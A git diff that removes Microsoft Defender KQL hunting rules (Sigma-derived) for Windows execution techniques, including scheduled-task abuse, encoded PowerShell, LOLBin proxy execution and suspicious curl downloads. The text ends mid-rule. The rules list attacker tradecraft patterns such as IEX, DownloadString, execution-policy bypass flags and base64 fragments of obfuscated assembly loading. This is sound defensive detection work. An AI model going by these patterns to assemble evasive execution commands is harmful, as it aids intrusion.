b/Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql deleted file mode 100644 index 0ea2e752..00000000 --- a/Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/01/16 -// Level: low -// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility. -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u -DeviceProcessEvents -| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) \ No newline at end of file diff --git a/Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql b/Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql deleted file mode 100644 index 3d746a96..00000000 --- a/Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/02/12 -// Level: high -// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. -// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/Execution/Scheduled_Task_Executing_Payload_from_Registry.kql b/Execution/Scheduled_Task_Executing_Payload_from_Registry.kql deleted file mode 100644 index 0e49c7fb..00000000 --- a/Execution/Scheduled_Task_Executing_Payload_from_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/07/18 -// Level: medium -// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. -// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand"))) \ No newline at end of file diff --git a/Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql b/Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql deleted file mode 100644 index c68909e4..00000000 --- a/Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/28 -// Level: high -// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges -// Tags: attack.execution, attack.persistence, attack.t1053.005 -DeviceProcessEvents -| where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe")))) \ No newline at end of file diff --git a/Execution/Schtasks_From_Suspicious_Folders.kql b/Execution/Schtasks_From_Suspicious_Folders.kql deleted file mode 100644 index 7ef23c76..00000000 --- a/Execution/Schtasks_From_Suspicious_Folders.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/04/15 -// Level: high -// Description: Detects scheduled task creations that have suspicious action command and folder combinations -// Tags: attack.execution, attack.t1053.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "%ProgramData%") and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ") and ProcessCommandLine contains " /create " and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/Execution/Script_Event_Consumer_Spawning_Process.kql b/Execution/Script_Event_Consumer_Spawning_Process.kql deleted file mode 100644 index f27035e7..00000000 --- a/Execution/Script_Event_Consumer_Spawning_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sittikorn S -// Date: 2021/06/21 -// Level: high -// Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe). -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msbuild.exe") and InitiatingProcessFolderPath endswith "\\scrcons.exe" \ No newline at end of file diff --git a/Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql b/Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql deleted file mode 100644 index ce37fdfb..00000000 --- a/Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/02/08 -// Level: high -// Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -ep bypass " or ProcessCommandLine contains " -ExecutionPolicy bypass " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains "/e:javascript " or ProcessCommandLine contains "/e:Jscript " or ProcessCommandLine contains "/e:vbscript ") or (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "mshta.exe", "wscript.exe"))) and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) \ No newline at end of file diff --git a/Execution/Service_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Service_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index 28498146..00000000 --- a/Execution/Service_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/14 -// Level: medium -// Description: An adversary might use WMI to check if a certain remote service is running on a remote device. -When the test completes, a service information will be displayed on the screen if it exists. -A common feedback message is that "No instance(s) Available" if the service queried is not running. -A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable - -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where ProcessCommandLine contains "service" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql b/Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql deleted file mode 100644 index c22f6141..00000000 --- a/Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/04 -// Level: medium -// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual" -// Tags: attack.execution, attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE") \ No newline at end of file diff --git a/Execution/Service_StartupType_Change_Via_Sc.EXE.kql b/Execution/Service_StartupType_Change_Via_Sc.EXE.kql deleted file mode 100644 index dc89c692..00000000 --- a/Execution/Service_StartupType_Change_Via_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/01 -// Level: medium -// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" -// Tags: attack.execution, attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql b/Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql deleted file mode 100644 index 572e8c51..00000000 --- a/Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/11/24 -// Level: high -// Description: Detects shell32.dll executing a DLL in a suspicious directory -// Tags: attack.defense_evasion, attack.execution, attack.t1218.011 -DeviceProcessEvents -| where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/Execution/Start_Windows_Service_Via_Net.EXE.kql b/Execution/Start_Windows_Service_Via_Net.EXE.kql deleted file mode 100644 index 2357f3be..00000000 --- a/Execution/Start_Windows_Service_Via_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community -// Date: 2019/10/21 -// Level: low -// Description: Detects the usage of the "net.exe" command to start a service using the "start" flag -// Tags: attack.execution, attack.t1569.002 -DeviceProcessEvents -| where ProcessCommandLine contains " start " and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql b/Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql deleted file mode 100644 index 03b12aec..00000000 --- a/Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jason Lynch -// Date: 2019/04/02 -// Level: high -// Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) -// Tags: attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002 -DeviceProcessEvents -| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\users\\" and (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.exe" or InitiatingProcessFolderPath endswith "\\EQNEDT32.exe")) and (not(FolderPath endswith "\\Teams.exe")) \ No newline at end of file diff --git a/Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql b/Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql deleted file mode 100644 index d6006a54..00000000 --- a/Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/16 -// Level: high -// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript -// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe") \ No newline at end of file diff --git a/Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql b/Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql deleted file mode 100644 index e2eb0ec4..00000000 --- a/Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/23 -// Level: high -// Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands -// Tags: attack.execution, attack.t1053.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (((ProcessCommandLine contains "/sc minute " or ProcessCommandLine contains "/ru system ") and (ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ")) or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " bypass " or ProcessCommandLine contains " IEX" or ProcessCommandLine contains ".DownloadData" or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString" or ProcessCommandLine contains "/c start /min " or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "mshta http" or ProcessCommandLine contains "mshta.exe http") or ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%") and (ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wscript"))) \ No newline at end of file diff --git a/Execution/Suspicious_Csi.exe_Usage.kql b/Execution/Suspicious_Csi.exe_Usage.kql deleted file mode 100644 index ea5c49ee..00000000 --- a/Execution/Suspicious_Csi.exe_Usage.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Konstantin Grishchenko, oscd.community -// Date: 2020/10/17 -// Level: medium -// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' -// Tags: attack.execution, attack.t1072, attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe"))) \ No newline at end of file diff --git a/Execution/Suspicious_Electron_Application_Child_Processes.kql b/Execution/Suspicious_Electron_Application_Child_Processes.kql deleted file mode 100644 index 81ee345f..00000000 --- a/Execution/Suspicious_Electron_Application_Child_Processes.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/21 -// Level: medium -// Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule) - -// Tags: attack.execution -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\discord.exe" or InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe" or InitiatingProcessFolderPath endswith "\\keybase.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\slack.exe" or InitiatingProcessFolderPath endswith "\\Teams.exe") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\")) and (not(((FolderPath endswith "\\chrome.exe" and InitiatingProcessFolderPath endswith "\\chrome.exe") or (FolderPath endswith "\\discord.exe" and InitiatingProcessFolderPath endswith "\\discord.exe") or (FolderPath endswith "\\GitHubDesktop.exe" and InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe") or (FolderPath endswith "\\keybase.exe" and InitiatingProcessFolderPath endswith "\\keybase.exe") or (FolderPath endswith "\\msedge.exe" and InitiatingProcessFolderPath endswith "\\msedge.exe") or (FolderPath endswith "\\msedgewebview2.exe" and InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") or (FolderPath endswith "\\msteams.exe" and InitiatingProcessFolderPath endswith "\\msteams.exe") or (FolderPath endswith "\\slack.exe" and InitiatingProcessFolderPath endswith "\\slack.exe") or (FolderPath endswith "\\teams.exe" and InitiatingProcessFolderPath endswith "\\teams.exe") or (FolderPath in~ ("C:\\Windows\\SysWOW64\\WerFault.exe", "C:\\Windows\\System32\\WerFault.exe"))))) and (not((ProcessCommandLine contains "\\NVSMI\\nvidia-smi.exe" and InitiatingProcessFolderPath endswith "\\Discord.exe"))) \ No newline at end of file diff --git a/Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql b/Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql deleted file mode 100644 index c8bc79a5..00000000 --- a/Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2022/03/01 -// Level: high -// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" -// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1027 -DeviceProcessEvents -| where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA" \ No newline at end of file diff --git a/Execution/Suspicious_Encoded_PowerShell_Command_Line.kql b/Execution/Suspicious_Encoded_PowerShell_Command_Line.kql deleted file mode 100644 index 28b221a3..00000000 --- a/Execution/Suspicious_Encoded_PowerShell_Command_Line.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community -// Date: 2018/09/03 -// Level: high -// Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aQBlAHgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAA" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " UwB" or ProcessCommandLine contains " cwB") and ProcessCommandLine contains " -e") or (ProcessCommandLine contains ".exe -ENCOD " or ProcessCommandLine contains " BA^J e-")) and (not(ProcessCommandLine contains " -ExecutionPolicy remotesigned ")) \ No newline at end of file diff --git a/Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql b/Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql deleted file mode 100644 index dcbabf9d..00000000 --- a/Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/10/14 -// Level: high -// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location. -// Tags: attack.execution -DeviceProcessEvents -| where FolderPath endswith "\\wermgr.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Execution/Suspicious_Execution_of_Powershell_with_Base64.kql b/Execution/Suspicious_Execution_of_Powershell_with_Base64.kql deleted file mode 100644 index 5ee1184e..00000000 --- a/Execution/Suspicious_Execution_of_Powershell_with_Base64.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/02 -// Level: medium -// Description: Commandline to launch powershell with a base64 payload -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco" or ProcessCommandLine contains " -ec ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (not(((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe") or ProcessCommandLine contains " -Encoding "))) \ No newline at end of file diff --git a/Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql b/Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql deleted file mode 100644 index c1cea9e1..00000000 --- a/Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, Sander Wiebing -// Date: 2018/11/22 -// Level: medium -// Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe -// Tags: attack.execution, attack.t1059.006 -DeviceProcessEvents -| where ((ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductVersion =~ "?") or (ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductName =~ "?") or (ProcessVersionInfoCompanyName =~ "?" and ProcessVersionInfoFileDescription =~ "?")) and FolderPath contains "\\Downloads\\" \ No newline at end of file diff --git a/Execution/Suspicious_File_Created_In_PerfLogs.kql b/Execution/Suspicious_File_Created_In_PerfLogs.kql deleted file mode 100644 index 45c8e0fb..00000000 --- a/Execution/Suspicious_File_Created_In_PerfLogs.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/05 -// Level: medium -// Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files -// Tags: attack.execution, attack.t1059 -DeviceFileEvents -| where (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".bin" or FolderPath endswith ".chm" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".py" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip") and FolderPath startswith "C:\\PerfLogs\\" \ No newline at end of file diff --git a/Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql b/Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql deleted file mode 100644 index 99d431f0..00000000 --- a/Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/05 -// Level: high -// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs -// Tags: attack.defense_evasion, attack.execution -DeviceFileEvents -| where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\"))) \ No newline at end of file diff --git a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql b/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql deleted file mode 100644 index 7514d439..00000000 --- a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/05 -// Level: high -// Description: Detects potentially suspicious file download from file sharing domains using curl.exe -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine 